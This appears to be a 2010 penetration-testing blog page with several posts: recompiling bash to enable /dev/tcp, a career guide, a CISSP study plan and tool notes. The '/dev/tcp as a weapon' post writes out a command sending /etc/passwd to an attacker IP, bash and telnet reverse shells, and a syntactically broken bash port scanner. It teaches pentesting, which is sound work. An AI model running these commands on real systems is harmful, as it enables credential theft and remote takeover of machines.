Enabling /dev/tcp on Backtrack 4r1(Ubuntu)

Posted in Fu (a.k.a Tips) on August 23, 2010 by Skyler

After my post on weaponizing /dev/tcp, I had some kickback  from people trying to test it out. Users on a Debian based system will have issues since bash is not compiled with /dev/tcp enabled. All it requires is a quick recompiling of the shell, and a few changes after that:

Step 1: Download the latest BASH source

use a browser to get it here.

or

cd /tmp
sudo wget ftp.gnu.org/gnu/bash/bash-4.1.tar.gz

NOTE: Backtrack uses an older version of bash. I am not sure if they do this for any specific reason. I compiled 4.1 and havn’t had any issues. Let me know if you know otherwise

Step 2: Extract the source code

tar zxvf bash-4.1.tar.gz
cd bash-4.1

Step 3: Configure and install

sudo su
./configure --enable-net-redirections
make && make install

Step 4: Replace old version of bash with the new version

mv /bin/bash /bin/bash-OLD
ln -s /usr/local/bin/bash /bin/bash

Step 5: Test!

check to see if your new installation works. Close your current terminal, and reopn it. Then issue the following command and check the results:

reliks@bt:/tmp$ bash --version
GNU bash, version 4.1.0(1)-release (i686-pc-linux-gnu)
..... reliks@bt:/tmp$ /bin/bash --version GNU bash, version 4.1.0(1)-release (i686-pc-linux-gnu)
The versions returned should be that of which you just installed. They should also match.

You can now test to see if your access to /dev/tcp works:

cat < /dev/tcp/time.nist.gov/13

There you go! You should get back the time according to NIST.

Let me know if you have any issues! thanks!

/dev/tcp as a weapon

Posted in Fu (a.k.a Tips) on August 20, 2010 by Skyler

Here is some Fu to improve your game when pen testing *nix.

Situation: You have shell access to a *nix system. You are looking to create a reverse shell, scan other machines on the subnet, and do some file transfer (/etc/passwd). However, there are some things preventing you:

  1. Scope prevents you from uploading any files onto the machine
  2. A Firewall/AV prevents using something like netcat.

what do you do? Use /dev/tcp

What is /dev/tcp?

this is a system file that allows you to interact directly with the tcp protocol.

Fu

In order to get this to work, you need to be able to set up netcat listeners on your own machine. This can be done like this:

$ nc -l -p <port>

Transfer file:

This is pretty straight forward, just like you would image:

cat /etc/passwd > /dev/tcp/<Attacker_IP>/<Port>

Back on your listener console, you would then see the contents of /etc/passwd displayed. You would then easily pipe that into a file for parsing or future reference.

Port Scanner

This piece or art comes from Pen Testing Ninjitsu. To create a port scanner using built in bash commands, this is what you are looking to do:

$port = 1; while [$port -lt 1024];do echo > /dev/tcp/<TARG_IP>/$port;
 [$? == 0] && echo $port "is open" >> /tmp/ports.txt; port = 'expr 
$port + 1'; done;

Let me break this down for you:

  • Create a variable called port, and set its value equal to 1
port = 1;
  • Create a loop that continues to run as long as the variable ‘port’ is less than 1024
while [$port -lt 1024];
  • For each iteration, send some packets to the target IP address, with the port number equal to the current value of  our ‘port’ variable
do echo > /dev/tcp/<TARG_IP>/$port;
  • Check to see what the bash error value is as a result of that echo into /dev/tcp. Check to see if it is equal to zero, or in other words, check to see if there were no errors
[$? == 0]
  • If it IS equal to zero, or in other words, there were no errors, append a string into /tmp/ports.txt stating that the last scanned port is open
&& echo $port "is open" >> /tmp/ports.txt;
  • Now increment the value of ‘port’ by 1, and finish this iteration of the loop.
port = 'expr $port + 1'; done;

Pretty messy, but also fairly straight forward. You could then just read

Backdoor/Reverse Shell

This is pretty slick in my opinion. Replicates netcat almost exactly. Not as pretty as some things, but still nice:

/bin/bash -i > /dev/tcp/<Attacker_IP>/<port> 0<&1 2>&1

This is also straight forward:

  • Invoke an interactive bash shell
/bin/bash -i
  • Pipe that shell to the attacker (who has a netcat listener running)
> /dev/tcp/<Attacker_IP>/<port>
  • Take standard input, and connect it to standard output. Do the same with standard error (2>)
0<&1 2>&1

This can also be similarly done using telnet by doing the following (although you need two listeners):

telnet <attacker_ip> <port_a> | /bin/bash | telnet <attacker_ip> <port_b>

Pretty elite. hope it helps!

Security 101: bitter sweet beginnings

Posted in Fu (a.k.a Tips) on August 19, 2010 by Skyler

I am creating this entry for my friend Sean. He was curious as to how to get into the security field. So here goes:

Why getting started is difficult

There are a few reasons getting into the security field is difficult. I have narrowed it down into a couple of reasons:

  1. The knowledge base grows faster than you can learn – What I mean by this is that new things are being developed/discovered ever few minutes. I remember getting started in security, I would spend time learning something out of a book, or off of a webpage, just to find out that it was now old news. I would try fervently to climb the ladder, starting at the basics working my way up. However, after trying desperately to climb as fast as I could I began to notice that the ladder was growing taller faster than I could climb! This can be disheartening.
  2. the width is just as big as the depth – There are so many different aspects of security! Testing, Incident Handling, Infrastructure, Management, etc, etc. They all seem to be quite similar, but also quite different in the kinds of skill sets they require! I remember feeling like the deeper I tried to delve into one area, the more complex and slower the learning became; Therefore the more I was falling behind in the other areas! This was very frustrating.
  3. the starting line is quite vague – The first article I was told to read was Aleph One’s Smashing the Stack For Fun and Profit. Because I was 15 years old with little lower-level language experience. O was completely overwhelmed. I would run into phrases and words I didnt understand. I would search to learn about those things. In the course of getting definitions of those terms, I found myself encountering more nonsensical data! Therefore my search began digging deeper and deeper, eventually becoming a hole that never led back to my starting point. This was overwhelming.

Disheartening, Frustrating, and Overwhelming…

So you see, getting started in the security field is difficult. I am sure many people have different experiences. I suppose getting started through formal education, or work experience helps.  I pretty much had nothing except the web, IRC, and some less-novice hacker than I who I could throw questions at. It was a miracle I didn’t just give up on it. I am going to share with you some tips/mindsets I developed from my experience, as well as some resources and wisdom I can share looking back on the situation.

(A  quick word from the Mentor)

In order to succeed, you just need to commit yourself. If you are committed, you are going to do amazing! Seriously, Security is quite technical, but amazingly simplistic. To explain what I mean, let me share with you a quote from the Hacker’s Manifesto (i know, i know, just bare with me):

I made a discovery today. I found a computer. Wait a second, this is cool. It does what I want it to. If it makes a mistake, it’s because I screwed it up. Not because it doesn’t like me…
Or feels threatened by me…
Or thinks I’m a smart ass…

I like this quote because it takes the magic out of computers. It reminds me that a computer simply has a set of rules, and that understanding those rules enables you to manipulate the system. Therefore, when learning security, remember that you are really just learning rules. Don’t get caught up in the proscribed methods, but recognize why those methods produce the results they do. If you do this, you will find yourself asking the RIGHT questions, and finding the BEST answers. This is KEY.

…But

Now that we have that out of the way, I am going to address the three issues I listed above:

  1. Knowledge base – This is simple. Don’t become disheartened. Just learn to plug yourself in. In the military, when doing combat maneuvers, you always provide security. Security elements will protect the primary element from becoming overran by any unexpected enemy reinforcements. Do this in your learning. Plug in to sources of the newest developments in the security field. This will ensure that you are learning the new stuff while you are catching up on the fundamentals. I recommend a few sources for this:
    • Mailing Lists: These are a great resource. Most security lists are very well moderated, and very active. I recommend most of the SecurityFocus lists, the Metasploit list , and maybe a few others. That should be enough for now.
    • Blogs: Blogs are a great resource. Some are better than others, but they are a great place to start. Check out my favorite security links located on the right panel of my blog. Some of my favorites are Darknet, and Mubix’s blog.
    • Podcasts: I Love my podcasts! I am always looking out for new ones! I strongly recommend PaulDotCom and SecurityNow. In addition you might like Hak5, and some others. I also recommend the SANS Internet Storm Center casts to be caught up to date on the latest and greatest security vulnerabilities.
    • News: These are critical. In my opinion the best site overall for security is Packetstorm. They offer learning texts, tool archives, and the latest news. I also watch the SANS ISC journals, and the SANS reading room.
    • Twitter – The security industry is extremely active on twitter. You should plug yourself in to them to get started. I think all but 2 of the people I follow on twitter are security based. Go ahead and use that as a good place to start.
  2. Width vs Depth: When it really comes down to it, you will just need to find one (or two) areas you really enjoy. When I say “Enjoy”, i mean it. You may want to end up doing management, but to start out I would find what appeals to you the most. This will guarantee that you keep interested, and will feel accomplished as you learn things! One thing I quickly learned was the amount of spillover that occurs at the deepest parts of each security emphasis. Truly, infrastructure will eventually lead to testing/auditing,  as well as incident handling, and so on. Like I said, find something you like, build a good basis, and then don’t be afraid to dive deep into what you enjoy. You will eventually find that you learn about all aspects of security, and wont mind the areas you lack in. The Security community is such a shared pool of knowledge, that learning from each other is half the fun. On that note, here are some tips to assist with this process:
    • Find your emphasis: Ask people on the mailing lists, search through forums, look for job descriptions. What I did was figure out what I thought was cool (breaking stuff), figure out what it was called (“hacking”), and then research what professional positions existed (Penetration Testing).
    • Find a mentor: Its all about who you know. Find someone who can help you answer your questions. They dont need to know everything, they just need to help point you in the right direction. My first mentors were a group of guys in an IRC channel. freenode has a ton of free channels. I would recommend checking out the above podcasts and looking into their IRC channels for people to help.
    • Hands-On as soon as possible – Get your hands-on right away. Download BackTrack to get your hands on a lot of new tools, and start learning linux. Don’t worry about knowing ALL of it; just learn what you need, and as further needs arise figure out how to do it. A great resource to figure out how to do things is SecurityTube. This site will give you tutorials and presentations on almost anything you need to know, from programming to hacking, etc. There are also a lot of great resources for practicing security related activities. Some of these are:
    • Certifications – I have found certifications to be great learning opportunities, not to mention how they increase your professional marketability. There are so many certs out there, that you can find one for whatever you are interested in. For those looking to do government/military work, I would look at the DoD 8570 to see what certs would give you the most flexibility for jobs. Here are some that I suggest:
      • Security+ – Overall great certification. If you want a good place to start for just overall security knowledge, this is the one you want.
      • eCPPT – I havn’t done this course, but I have heard nothing but great reviews. It includes the courseware for life, making it an excellent resource after you get the certification.
      • CEH – This is a great starter for those interested in penetration testing, or incident handling. I would strongly recommend this.
      • CCNA – If you are going to be doing more infrastructure, you may want to look into Cisco stuff. I put the CCNA because its considered the entry level Cisco cert. You eventually might want the CCNA-Security and some of the other certs that qualify you for firewalls and ids configuration.
      • CHFI – This is a good Incident Handler certification. Pretty cheap. I think you have to take the CEH before you can take this one.
  3. Starting Line: There is none. Thats okay. You need to learn to revel in the successes! Become a sponge and just absorb everything. When you read something you don’t understand, dont fret. Just remember it, let it serve as a placeholder, and learn about it when you can. Dont let this be overwhelming! Let it be FUN! Find opportunities to teach others and you will figure out more than you would have initially. There are a few things I would recommend you learn that will answer a large amount of your potential questions:
    • TCP/IP – Learn about TCP/IP packets, layers, and basic communications. Understand these and you will do well. I would take the time to read the RFCs for these specific protocols.
    • Basic Programming – Being able to read through code logic. not necessarily know how to program.
    • Linux/Windows commands – knowing your way around the command line of both these systems will help greatly.

Hopefully this has been a good start to helping those get involved. Feel free to ask any questions.

Enjoy!

[Review] Pentesting Ninjitsu

Posted in Reviews on August 19, 2010 by Skyler

This is an older (2008) series of webcasts produced by Core Security. It features Ed Skoudis, from InGuardians, and a SANS Instructor.

This was an absolutely fantastic learning experience. If you are like me, when you first learned about hacking you figured that a “real” hacker could just sit down at any machine and do whatever he needed from a command shell; info gathering, scanning, exploitation, maintaining access, etc. After actually learning more about the field, I began to understand the near necessity of tools and the importance of having a nice arsenal.

In this podcast Ed Skoudis brings us back to the leetness of pure command line hacking. And to top it off, its primarily focused on cmd.exe; not what a pen tester would call their weapon of choice.

Skoudis goes over using cmd.exe as a port scanner, backdoor, wardriving tool, and more. I definetly recommend everybody check this out. I guarantee it will help you in your future assessments by overcoming scope issues, as well as post-assessment cleanup.

It reminded me of one of the CTFs at the HBN:Combat course I took at Black Hat this year. I had to capture some packets of a proprietary protocol, and then replay it brute-forcing some hundred different combinations. I ended up capturing it with wireshark, then doing some nasty loop and replace functionality with powershell. I then set up some capture filters on wireshark and was able to get my results. Not very sexy, yet worked. It was my white belt version of PenTesting Ninjitsu.

Anyway, check it out, and enjoy!

you can find it here!

CISSP Study Plan

Posted in Certifications on August 18, 2010 by Skyler

I am considering taking on the CISSP as my next certification. I am finishing up the ECSA (review to come), and I am already leveling my sights on the next target.

CISSP vs. eLearnSecurity

I was debating on what my next target should be. Seeing as the next semester starts up in 3 weeks, I was hesitant to commit myself to something too big, but still wanted a good goal. I had long been wanting to enroll in the eLearnSecurity Pro Pentesting Course, but for some reason I could never justify the cost. What I mean is that under threat of a new version, the obscurity and lack of credibility of the certification, and the fear that the course delivers less than it advertises, I am skeptical to invest in that course. Nevertheless, it still remains something I would like to try.

On the other hand, the CISSP still remains the defacto gold medal for Security professionals. Although not Penetration Testing focused, it is the top dog of the DoD 8570 and packs lots of credibility. The CISSP is no simple task, and (from what I have seen) yields an 80% failure rate. However, seeing as my past certification history has always resulted well due to good study, I believe I could do it.

So for those reasons I have decided to work for the CISSP rather than the eLearnSecurity course (eCPPT). If you think i am making a mistake in that choice, please share with me your comments.

So how do I prepare?

After much studying and researching, I figured out that my best choice for prep material would stem from 2 books.

  1. Official (ISC)2 Guide to the CISSP CBK, 2nd Edition by (ISC)2 Press)
  2. CISSP All-In-One Exam Guide 5th Edition by Shon Harris

These seem to be the best books to use. I will also use the Shon Harris exam mentor CBT, as well as the CCCure.org site and practice exams.

Spending at least 5-10 hours a week, I am wondering how soon I will be prepared. Earliest I could take the exam is November 20th, but more than likely Ill end up taking it in January (the exams are live, proctored exams that are scheduled in different regions at different times).

I think I might try to follow the outline of this fellows study plan.

If anyone has taken the CISSP or is preparing for it, please contact me. I would love to compare and discuss study helps and such!

Wordlist Generator and Password Lists

Posted in Fu (a.k.a Tips), Tools on August 16, 2010 by Skyler

I am a dedicated follower of the Darknet blog. Today they posted about an awesome wordlist mangling tool that improves upon John the Ripper. They also reposted a link to a past entry about already generated lists. You should definitely check these out.

Darknet- RSMangler

and

Darknet – Wordlists

[Tool] pivot-scan

Posted in Tools on August 13, 2010 by Skyler

I am trying to figure out how to perform port scans via an exploited host using meterpreter. It can be done with netcat relays, but I really want to see it done in metepreter. Unfortunately, as far as I know, pivoting with metasploit only pivots exploits and such plugins.

To overcome this you usually have to upload a port scanner onto the first exploited machine and scan from there. Not too sexy, but works.

http://seclists.org/pen-test/2009/Mar/113 mentions a metasploit plugin called pivot-scan by Augusto Pereyra. You better believe I have added this tool into my arsenal.

get it here!

Also, if you are looking to do full metasploit functionality on the first compromised host, check out Mubix’s plugin here to send metasploit as a payload.

BTW, if anyone has figured out how to namp through a metasploit route, then let me know!!!